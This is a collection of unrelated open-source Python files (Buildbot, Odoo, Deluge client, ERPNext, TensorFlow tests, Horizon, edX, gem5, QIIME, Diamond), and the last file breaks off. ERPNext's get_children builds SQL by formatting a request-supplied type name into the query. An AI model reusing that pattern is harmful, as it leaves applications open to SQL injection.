# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from twisted.python import log
from buildbot import config
from buildbot.statistics.storage_backends.base import StatsStorageBase
try:
from influxdb import InfluxDBClient
except ImportError:
InfluxDBClient = None
class InfluxStorageService(StatsStorageBase):
"""
Delegates data to InfluxDB
"""
def __init__(self, url, port, user, password, db, captures,
name="InfluxStorageService"):
if not InfluxDBClient:
config.error("Python client for InfluxDB not installed.")
return
self.url = url
self.port = port
self.user = user
self.password = password
self.db = db
self.name = name
self.captures = captures
self.client = InfluxDBClient(self.url, self.port, self.user,
self.password, self.db)
self._inited = True
def thd_postStatsValue(self, post_data, series_name, context=None):
if not self._inited:
log.err("Service {0} not initialized".format(self.name))
return
data = {
'measurement': series_name,
'fields': post_data
}
log.msg("Sending data to InfluxDB")
log.msg("post_data: {0!r}".format(post_data))
if context:
log.msg("context: {0!r}".format(context))
data['tags'] = context
self.client.write_points([data])
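# Hedged usage sketch (not part of the original module): the service is
# normally constructed from the buildmaster configuration, e.g.
#
#   svc = InfluxStorageService('localhost', 8086, 'user', 'pass', 'stats',
#                              captures=[])
#   svc.thd_postStatsValue({'value': 1.0}, 'build_times')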
|
mit
|
naousse/odoo
|
addons/event/wizard/event_confirm.py
|
339
|
1387
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api
class event_confirm(models.TransientModel):
"""Event Confirmation"""
_name = "event.confirm"
@api.multi
def confirm(self):
events = self.env['event.event'].browse(self._context.get('event_ids', []))
events.do_confirm()
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
AmrThabet/CouchPotatoServer
|
libs/synchronousdeluge/client.py
|
151
|
5078
|
import os
import platform
from collections import defaultdict
from itertools import imap
from synchronousdeluge.exceptions import DelugeRPCError
from synchronousdeluge.protocol import DelugeRPCRequest, DelugeRPCResponse
from synchronousdeluge.transfer import DelugeTransfer
__all__ = ["DelugeClient"]
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
class DelugeClient(object):
def __init__(self):
"""A deluge client session."""
self.transfer = DelugeTransfer()
self.modules = []
self._request_counter = 0
def _get_local_auth(self):
auth_file = ""
username = password = ""
if platform.system() in ('Windows', 'Microsoft'):
appDataPath = os.environ.get("APPDATA")
if not appDataPath:
import _winreg
hkey = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders")
appDataReg = _winreg.QueryValueEx(hkey, "AppData")
appDataPath = appDataReg[0]
_winreg.CloseKey(hkey)
auth_file = os.path.join(appDataPath, "deluge", "auth")
else:
from xdg.BaseDirectory import save_config_path
try:
auth_file = os.path.join(save_config_path("deluge"), "auth")
except OSError, e:
return username, password
if os.path.exists(auth_file):
for line in open(auth_file):
if line.startswith("#"):
# This is a comment line
continue
line = line.strip()
try:
lsplit = line.split(":")
except Exception, e:
continue
if len(lsplit) == 2:
username, password = lsplit
elif len(lsplit) == 3:
username, password, level = lsplit
else:
continue
if username == "localclient":
return (username, password)
return ("", "")
def _create_module_method(self, module, method):
fullname = "{0}.{1}".format(module, method)
def func(obj, *args, **kwargs):
return self.remote_call(fullname, *args, **kwargs)
func.__name__ = method
return func
def _introspect(self):
self.modules = []
methods = self.remote_call("daemon.get_method_list").get()
methodmap = defaultdict(dict)
splitter = lambda v: v.split(".")
for module, method in imap(splitter, methods):
methodmap[module][method] = self._create_module_method(module, method)
for module, methods in methodmap.items():
clsname = "DelugeModule{0}".format(module.capitalize())
cls = type(clsname, (), methods)
setattr(self, module, cls())
self.modules.append(module)
def remote_call(self, method, *args, **kwargs):
req = DelugeRPCRequest(self._request_counter, method, *args, **kwargs)
message = next(self.transfer.send_request(req))
response = DelugeRPCResponse()
if not isinstance(message, tuple):
return
if len(message) < 3:
return
message_type = message[0]
# if message_type == RPC_EVENT:
# event = message[1]
# values = message[2]
#
# if event in self._event_handlers:
# for handler in self._event_handlers[event]:
# gevent.spawn(handler, *values)
#
# elif message_type in (RPC_RESPONSE, RPC_ERROR):
if message_type in (RPC_RESPONSE, RPC_ERROR):
request_id = message[1]
value = message[2]
            if request_id == self._request_counter:
if message_type == RPC_RESPONSE:
response.set(value)
elif message_type == RPC_ERROR:
err = DelugeRPCError(*value)
response.set_exception(err)
self._request_counter += 1
return response
def connect(self, host="127.0.0.1", port=58846, username="", password=""):
"""Connects to a daemon process.
:param host: str, the hostname of the daemon
:param port: int, the port of the daemon
:param username: str, the username to login with
:param password: str, the password to login with
"""
# Connect transport
self.transfer.connect((host, port))
# Attempt to fetch local auth info if needed
if not username and host in ("127.0.0.1", "localhost"):
username, password = self._get_local_auth()
# Authenticate
self.remote_call("daemon.login", username, password).get()
# Introspect available methods
self._introspect()
@property
def connected(self):
return self.transfer.connected
def disconnect(self):
"""Disconnects from the daemon."""
self.transfer.disconnect()
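# Hedged usage sketch (not part of the original module; 'core' and its
# methods depend on what the daemon's introspected API actually exposes):
#
#   client = DelugeClient()
#   client.connect()  # local daemon; credentials read from the auth file
#   torrents = client.core.get_session_state().get()
#   client.disconnect()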
|
gpl-3.0
|
rohitwaghchaure/erpnext_smart
|
erpnext/accounts/page/accounts_browser/accounts_browser.py
|
34
|
1493
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe.utils import flt
from erpnext.accounts.utils import get_balance_on
@frappe.whitelist()
def get_companies():
"""get a list of companies based on permission"""
return [d.name for d in frappe.get_list("Company", fields=["name"],
order_by="name")]
@frappe.whitelist()
def get_children():
args = frappe.local.form_dict
ctype, company = args['ctype'], args['comp']
# root
if args['parent'] in ("Accounts", "Cost Centers"):
acc = frappe.db.sql(""" select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = ''
and `company` = %s and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
company, as_dict=1)
else:
# other
acc = frappe.db.sql("""select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = %s
and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
args['parent'], as_dict=1)
if ctype == 'Account':
currency = frappe.db.sql("select default_currency from `tabCompany` where name = %s", company)[0][0]
for each in acc:
bal = get_balance_on(each.get("value"))
each["currency"] = currency
each["balance"] = flt(bal)
return acc
|
agpl-3.0
|
frreiss/tensorflow-fred
|
tensorflow/python/framework/ops_enable_eager_test.py
|
28
|
1702
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests enabling eager execution at process level."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.platform import googletest
class OpsEnableAndDisableEagerTest(googletest.TestCase):
def setUp(self):
# test for enable eager test
ops.enable_eager_execution()
self.assertTrue(context.executing_eagerly())
# Calling enable eager execution a second time should not cause an error.
ops.enable_eager_execution()
self.assertTrue(context.executing_eagerly())
def tearDown(self):
# test for disable eager test
ops.disable_eager_execution()
self.assertFalse(context.executing_eagerly())
# Calling disable eager execution a second time should not cause an error.
ops.disable_eager_execution()
self.assertFalse(context.executing_eagerly())
if __name__ == '__main__':
googletest.main()
|
apache-2.0
|
philoniare/horizon
|
openstack_dashboard/dashboards/admin/flavors/views.py
|
14
|
2910
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import tables
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.flavors \
import tables as project_tables
from openstack_dashboard.dashboards.admin.flavors \
import workflows as flavor_workflows
INDEX_URL = "horizon:admin:flavors:index"
class IndexView(tables.DataTableView):
table_class = project_tables.FlavorsTable
template_name = 'admin/flavors/index.html'
page_title = _("Flavors")
def get_data(self):
request = self.request
flavors = []
try:
# "is_public=None" will return all flavors.
flavors = api.nova.flavor_list(request, None)
except Exception:
exceptions.handle(request,
_('Unable to retrieve flavor list.'))
# Sort flavors by size
flavors.sort(key=lambda f: (f.vcpus, f.ram, f.disk))
return flavors
class CreateView(workflows.WorkflowView):
workflow_class = flavor_workflows.CreateFlavor
template_name = 'admin/flavors/create.html'
page_title = _("Create Flavor")
class UpdateView(workflows.WorkflowView):
workflow_class = flavor_workflows.UpdateFlavor
template_name = 'admin/flavors/update.html'
page_title = _("Edit Flavor")
def get_initial(self):
flavor_id = self.kwargs['id']
try:
# Get initial flavor information
flavor = api.nova.flavor_get(self.request, flavor_id)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve flavor details.'),
redirect=reverse_lazy(INDEX_URL))
return {'flavor_id': flavor.id,
'name': flavor.name,
'vcpus': flavor.vcpus,
'memory_mb': flavor.ram,
'disk_gb': flavor.disk,
'swap_mb': flavor.swap or 0,
'eph_gb': getattr(flavor, 'OS-FLV-EXT-DATA:ephemeral', None)}
|
apache-2.0
|
sgraham/nope
|
tools/security/check_message_owners.py
|
105
|
1506
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make sure all of the per-file *_messages.h OWNERS are consistent"""
import os
import re
import sys
def main():
  file_path = os.path.dirname(__file__)
root_dir = os.path.abspath(os.path.join(file_path, '..', '..'))
owners = collect_owners(root_dir)
all_owners = get_all_owners(owners)
print_missing_owners(owners, all_owners)
return 0
def collect_owners(root_dir):
result = {}
for root, dirs, files in os.walk(root_dir):
if "OWNERS" in files:
owner_file_path = os.path.join(root, "OWNERS")
owner_set = extract_owners_from_file(owner_file_path)
if owner_set:
result[owner_file_path] = owner_set
return result
def extract_owners_from_file(owner_file_path):
result = set()
  regexp = re.compile(r'^per-file.*_messages[^=]*=\s*(.*)@([^#]*)')
with open(owner_file_path) as f:
for line in f:
match = regexp.match(line)
if match:
result.add(match.group(1).strip())
return result
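# Hedged illustration (not part of the original script): the regexp above
# matches per-file lines such as
#   per-file foo_messages.h=jane@chromium.org
# and extract_owners_from_file() collects the user part ('jane').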
def get_all_owners(owner_dict):
result = set()
for key in owner_dict:
result = result.union(owner_dict[key])
return result
def print_missing_owners(owner_dict, owner_set):
for key in owner_dict:
for owner in owner_set:
if not owner in owner_dict[key]:
print key + " is missing " + owner
if '__main__' == __name__:
sys.exit(main())
|
bsd-3-clause
|
zlorenz/synergy
|
synergy/config/urls.py
|
1
|
1532
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$',
'users.views.contact',
name="home"),
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name="about"),
url(r'^personal/$',
TemplateView.as_view(template_name='pages/personal.html'),
name="personal"),
url(r'^business/$',
TemplateView.as_view(template_name='pages/business.html'),
name="business"),
url(r'^professionals/$',
TemplateView.as_view(template_name='pages/professionals.html'),
name="professionals"),
url(r'^clients/$',
TemplateView.as_view(template_name='pages/clients.html'),
name="clients"),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# User management
url(r'^users/', include("users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Uncomment the next line to enable avatars
url(r'^avatar/', include('avatar.urls')),
# Your stuff: custom urls go here
url(r'^pages/', include("nupages.urls", namespace="nupages")),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
bsd-3-clause
|
vrv/tensorflow
|
tensorflow/python/kernel_tests/conv2d_backprop_filter_grad_test.py
|
101
|
2774
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for convolution related functionality in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class Conv2DBackpropFilterGradTest(test.TestCase):
def testGradient(self):
with self.test_session():
for padding in ["SAME", "VALID"]:
for stride in [1, 2]:
np.random.seed(1)
in_shape = [5, 8, 6, 4]
in_val = constant_op.constant(
2 * np.random.random_sample(in_shape) - 1, dtype=dtypes.float32)
filter_shape = [3, 3, 4, 6]
# Make a convolution op with the current settings, just to easily get
# the shape of the output.
conv_out = nn_ops.conv2d(in_val,
array_ops.zeros(filter_shape),
[1, stride, stride, 1], padding)
out_backprop_shape = conv_out.get_shape().as_list()
out_backprop_val = constant_op.constant(
2 * np.random.random_sample(out_backprop_shape) - 1,
dtype=dtypes.float32)
output = nn_ops.conv2d_backprop_filter(in_val, filter_shape,
out_backprop_val,
[1, stride, stride, 1],
padding)
err = gradient_checker.compute_gradient_error(
[in_val, out_backprop_val], [in_shape, out_backprop_shape],
output, filter_shape)
print("conv2d_backprop_filter gradient err = %g " % err)
err_tolerance = 2e-3
self.assertLess(err, err_tolerance)
if __name__ == "__main__":
test.main()
|
apache-2.0
|
MakeHer/edx-platform
|
cms/djangoapps/contentstore/views/library.py
|
36
|
9259
|
"""
Views related to content libraries.
A content library is a structure containing XBlocks which can be re-used in
multiple courses.
"""
from __future__ import absolute_import
import json
import logging
from contentstore.views.item import create_xblock_info
from contentstore.utils import reverse_library_url, add_instructor
from django.http import HttpResponseNotAllowed, Http404
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.conf import settings
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_http_methods
from django.views.decorators.csrf import ensure_csrf_cookie
from edxmako.shortcuts import render_to_response
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import LibraryLocator, LibraryUsageLocator
from xmodule.modulestore.exceptions import DuplicateCourseError
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from .user import user_with_role
from .component import get_component_templates, CONTAINER_TEMPLATES
from student.auth import (
STUDIO_VIEW_USERS, STUDIO_EDIT_ROLES, get_user_permissions, has_studio_read_access, has_studio_write_access
)
from student.roles import CourseInstructorRole, CourseStaffRole, LibraryUserRole
from util.json_request import expect_json, JsonResponse, JsonResponseBadRequest
__all__ = ['library_handler', 'manage_library_users']
log = logging.getLogger(__name__)
LIBRARIES_ENABLED = settings.FEATURES.get('ENABLE_CONTENT_LIBRARIES', False)
@login_required
@ensure_csrf_cookie
@require_http_methods(('GET', 'POST'))
def library_handler(request, library_key_string=None):
"""
RESTful interface to most content library related functionality.
"""
if not LIBRARIES_ENABLED:
log.exception("Attempted to use the content library API when the libraries feature is disabled.")
raise Http404 # Should never happen because we test the feature in urls.py also
if library_key_string is not None and request.method == 'POST':
return HttpResponseNotAllowed(("POST",))
if request.method == 'POST':
return _create_library(request)
# request method is get, since only GET and POST are allowed by @require_http_methods(('GET', 'POST'))
if library_key_string:
return _display_library(library_key_string, request)
return _list_libraries(request)
def _display_library(library_key_string, request):
"""
    Displays a single library
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
log.exception("Non-library key passed to content libraries API.") # Should never happen due to url regex
raise Http404 # This is not a library
if not has_studio_read_access(request.user, library_key):
log.exception(
u"User %s tried to access library %s without permission",
request.user.username, unicode(library_key)
)
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
log.exception(u"Library %s not found", unicode(library_key))
raise Http404
response_format = 'html'
if (
request.REQUEST.get('format', 'html') == 'json' or
'application/json' in request.META.get('HTTP_ACCEPT', 'text/html')
):
response_format = 'json'
return library_blocks_view(library, request.user, response_format)
def _list_libraries(request):
"""
List all accessible libraries
"""
lib_info = [
{
"display_name": lib.display_name,
"library_key": unicode(lib.location.library_key),
}
for lib in modulestore().get_libraries()
if has_studio_read_access(request.user, lib.location.library_key)
]
return JsonResponse(lib_info)
@expect_json
def _create_library(request):
"""
Helper method for creating a new library.
"""
display_name = None
try:
display_name = request.json['display_name']
org = request.json['org']
library = request.json.get('number', None)
if library is None:
library = request.json['library']
store = modulestore()
with store.default_store(ModuleStoreEnum.Type.split):
new_lib = store.create_library(
org=org,
library=library,
user_id=request.user.id,
fields={"display_name": display_name},
)
# Give the user admin ("Instructor") role for this library:
add_instructor(new_lib.location.library_key, request.user, request.user)
except KeyError as error:
log.exception("Unable to create library - missing required JSON key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library - missing required field '{field}'").format(field=error.message)
})
except InvalidKeyError as error:
log.exception("Unable to create library - invalid key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library '{name}'.\n\n{err}").format(name=display_name, err=error.message)
})
except DuplicateCourseError:
log.exception("Unable to create library - one already exists with the same key.")
return JsonResponseBadRequest({
'ErrMsg': _(
'There is already a library defined with the same '
'organization and library code. Please '
'change your library code so that it is unique within your organization.'
)
})
lib_key_str = unicode(new_lib.location.library_key)
return JsonResponse({
'url': reverse_library_url('library_handler', lib_key_str),
'library_key': lib_key_str,
})
def library_blocks_view(library, user, response_format):
"""
The main view of a course's content library.
Shows all the XBlocks in the library, and allows adding/editing/deleting
them.
Can be called with response_format="json" to get a JSON-formatted list of
the XBlocks in the library along with library metadata.
Assumes that read permissions have been checked before calling this.
"""
assert isinstance(library.location.library_key, LibraryLocator)
assert isinstance(library.location, LibraryUsageLocator)
children = library.children
if response_format == "json":
# The JSON response for this request is short and sweet:
prev_version = library.runtime.course_entry.structure['previous_version']
return JsonResponse({
"display_name": library.display_name,
"library_id": unicode(library.location.library_key),
"version": unicode(library.runtime.course_entry.course_key.version),
"previous_version": unicode(prev_version) if prev_version else None,
"blocks": [unicode(x) for x in children],
})
can_edit = has_studio_write_access(user, library.location.library_key)
xblock_info = create_xblock_info(library, include_ancestor_info=False, graders=[])
component_templates = get_component_templates(library, library=True) if can_edit else []
return render_to_response('library.html', {
'can_edit': can_edit,
'context_library': library,
'component_templates': component_templates,
'xblock_info': xblock_info,
'templates': CONTAINER_TEMPLATES,
})
def manage_library_users(request, library_key_string):
"""
Studio UI for editing the users within a library.
Uses the /course_team/:library_key/:user_email/ REST API to make changes.
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
raise Http404 # This is not a library
user_perms = get_user_permissions(request.user, library_key)
if not user_perms & STUDIO_VIEW_USERS:
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
raise Http404
# Segment all the users explicitly associated with this library, ensuring each user only has one role listed:
instructors = set(CourseInstructorRole(library_key).users_with_role())
staff = set(CourseStaffRole(library_key).users_with_role()) - instructors
users = set(LibraryUserRole(library_key).users_with_role()) - instructors - staff
formatted_users = []
for user in instructors:
formatted_users.append(user_with_role(user, 'instructor'))
for user in staff:
formatted_users.append(user_with_role(user, 'staff'))
for user in users:
formatted_users.append(user_with_role(user, 'library_user'))
return render_to_response('manage_users_lib.html', {
'context_library': library,
'users': formatted_users,
'allow_actions': bool(user_perms & STUDIO_EDIT_ROLES),
'library_key': unicode(library_key),
'lib_users_url': reverse_library_url('manage_library_users', library_key_string),
'show_children_previews': library.show_children_previews
})
|
agpl-3.0
|
koparasy/gemfi
|
src/arch/x86/bios/ACPI.py
|
73
|
3853
|
# Copyright (c) 2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from m5.params import *
from m5.SimObject import SimObject
# ACPI description table header. Subclasses contain and handle the actual
# contents as appropriate for that type of table.
class X86ACPISysDescTable(SimObject):
type = 'X86ACPISysDescTable'
cxx_class = 'X86ISA::ACPI::SysDescTable'
cxx_header = 'arch/x86/bios/acpi.hh'
abstract = True
oem_id = Param.String('', 'string identifying the oem')
oem_table_id = Param.String('', 'oem table ID')
oem_revision = Param.UInt32(0, 'oem revision number for the table')
creator_id = Param.String('',
'string identifying the generator of the table')
creator_revision = Param.UInt32(0,
'revision number for the creator of the table')
class X86ACPIRSDT(X86ACPISysDescTable):
type = 'X86ACPIRSDT'
cxx_class = 'X86ISA::ACPI::RSDT'
cxx_header = 'arch/x86/bios/acpi.hh'
entries = VectorParam.X86ACPISysDescTable([], 'system description tables')
class X86ACPIXSDT(X86ACPISysDescTable):
type = 'X86ACPIXSDT'
cxx_class = 'X86ISA::ACPI::XSDT'
cxx_header = 'arch/x86/bios/acpi.hh'
entries = VectorParam.X86ACPISysDescTable([], 'system description tables')
# Root System Description Pointer Structure
class X86ACPIRSDP(SimObject):
type = 'X86ACPIRSDP'
cxx_class = 'X86ISA::ACPI::RSDP'
cxx_header = 'arch/x86/bios/acpi.hh'
oem_id = Param.String('', 'string identifying the oem')
# Because 0 encodes ACPI 1.0, 2 encodes ACPI 3.0, the version implemented
# here.
revision = Param.UInt8(2, 'revision of ACPI being used, zero indexed')
rsdt = Param.X86ACPIRSDT(NULL, 'root system description table')
xsdt = Param.X86ACPIXSDT(X86ACPIXSDT(),
'extended system description table')
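# Hedged configuration sketch (not part of the original file): a minimal
# RSDP pointing at an empty XSDT might be assembled as
#
#   rsdp = X86ACPIRSDP(oem_id='M5')
#   rsdp.xsdt = X86ACPIXSDT(entries=[])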
|
bsd-3-clause
|
biocore/qiime
|
scripts/parallel_pick_otus_blast.py
|
15
|
4460
|
#!/usr/bin/env python
# File created on 09 Feb 2010
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME Project"
__credits__ = ["Greg Caporaso", "Dan Knights", "Jose Antonio Navas Molina"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "gregcaporaso@gmail.com"
from qiime.util import (parse_command_line_parameters,
get_options_lookup,
make_option)
from qiime.parallel.pick_otus import ParallelPickOtusBlast
options_lookup = get_options_lookup()
script_info = {}
script_info['brief_description'] = """Parallel pick otus using BLAST"""
script_info[
'script_description'] = """This script performs like the pick_otus.py script, but is intended to make use of multicore/multiprocessor environments to perform analyses in parallel."""
script_info['script_usage'] = []
script_info['script_usage'].append(
("""Example""",
"""Pick OTUs by blasting $PWD/inseqs.fasta against $PWD/refseqs.fasta and write the output to the $PWD/blast_otus/ directory. ALWAYS SPECIFY ABSOLUTE FILE PATHS (absolute path represented here as $PWD, but will generally look something like /home/ubuntu/my_analysis/).""",
"""%prog -i $PWD/seqs.fna -r $PWD/refseqs.fna -o $PWD/blast_otus/"""))
script_info[
'output_description'] = """The output consists of two files (i.e. seqs_otus.txt and seqs_otus.log). The .txt file is composed of tab-delimited lines, where the first field on each line corresponds to an (arbitrary) cluster identifier, and the remaining fields correspond to sequence identifiers assigned to that cluster. Sequence identifiers correspond to those provided in the input FASTA file. The resulting .log file contains a list of parameters passed to this script along with the output location of the resulting .txt file."""
script_info['required_options'] = [
make_option('-i', '--input_fasta_fp', action='store',
type='existing_filepath', help='full path to ' +
'input_fasta_fp'),
make_option('-o', '--output_dir', action='store',
type='new_dirpath', help='path to store output files')
]
script_info['optional_options'] = [
make_option('-e', '--max_e_value',
help='Max E-value ' +
'[default: %default]', default='1e-10'),
make_option('-s', '--similarity', action='store',
type='float', help='Sequence similarity ' +
'threshold [default: %default]', default=0.97),
make_option('-r', '--refseqs_fp', action='store',
type='existing_filepath', help='full path to ' +
'template alignment [default: %default]'),
make_option('-b', '--blast_db', action='store',
type='blast_db', help='database to blast against ' +
'[default: %default]'),
make_option('--min_aligned_percent',
help=('Minimum percent of query sequence that can be aligned '
'to consider a hit, expressed as a fraction between 0 '
'and 1 (BLAST OTU picker only) [default: %default]'),
default=0.50, type='float'),
options_lookup['jobs_to_start'],
options_lookup['retain_temp_files'],
options_lookup['suppress_submit_jobs'],
options_lookup['poll_directly'],
options_lookup['cluster_jobs_fp'],
options_lookup['suppress_polling'],
options_lookup['job_prefix'],
options_lookup['seconds_to_sleep']
]
script_info['version'] = __version__
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
if opts.blast_db is None and opts.refseqs_fp is None:
option_parser.error('Either blast_db or refseqs_fp must be provided.')
# create dict of command-line options
params = eval(str(opts))
parallel_runner = ParallelPickOtusBlast(
cluster_jobs_fp=opts.cluster_jobs_fp,
jobs_to_start=opts.jobs_to_start,
retain_temp_files=opts.retain_temp_files,
suppress_polling=opts.suppress_polling,
seconds_to_sleep=opts.seconds_to_sleep)
parallel_runner(opts.input_fasta_fp,
opts.output_dir,
params,
job_prefix=opts.job_prefix,
poll_directly=opts.poll_directly,
suppress_submit_jobs=opts.suppress_submit_jobs)
if __name__ == "__main__":
main()
|
gpl-2.0
|
Netuitive/Diamond
|
src/collectors/ntpd/test/testntpd.py
|
31
|
2751
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from ntpd import NtpdCollector
##########################################################################
class TestNtpdCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('NtpdCollector', {})
self.collector = NtpdCollector(config, None)
def test_import(self):
self.assertTrue(NtpdCollector)
@patch.object(Collector, 'publish')
def test_should_work_wtih_real_data(self, publish_mock):
ntpq_data = Mock(
return_value=self.getFixture('ntpq').getvalue())
ntpdc_kerninfo_data = Mock(
return_value=self.getFixture('ntpdc_kerninfo').getvalue())
ntpdc_sysinfo_data = Mock(
return_value=self.getFixture('ntpdc_sysinfo').getvalue())
collector_mock = patch.multiple(
NtpdCollector,
get_ntpq_output=ntpq_data,
get_ntpdc_kerninfo_output=ntpdc_kerninfo_data,
get_ntpdc_sysinfo_output=ntpdc_sysinfo_data)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
metrics = {
'jitter': 0.026,
'when': 39,
